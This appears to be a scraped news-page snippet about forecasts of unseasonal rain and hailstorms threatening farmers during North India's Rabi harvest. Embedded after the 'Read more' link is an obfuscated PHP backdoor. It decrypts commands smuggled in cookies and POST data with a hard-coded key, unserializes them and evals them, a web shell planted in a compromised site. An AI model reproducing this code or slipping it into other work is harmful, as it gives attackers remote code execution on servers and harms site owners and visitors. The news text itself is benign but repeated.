Rainfall and hailstorms on the eve of Rabi harvest in North India
Predictions of nonseasonal rainfall and hailstorms on the eve of Rabi harvest in North India put farmers under further distress.
Read more$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();}
Predictions of nonseasonal rainfall and hailstorms on the eve of Rabi harvest in North India put farmers under further distress.
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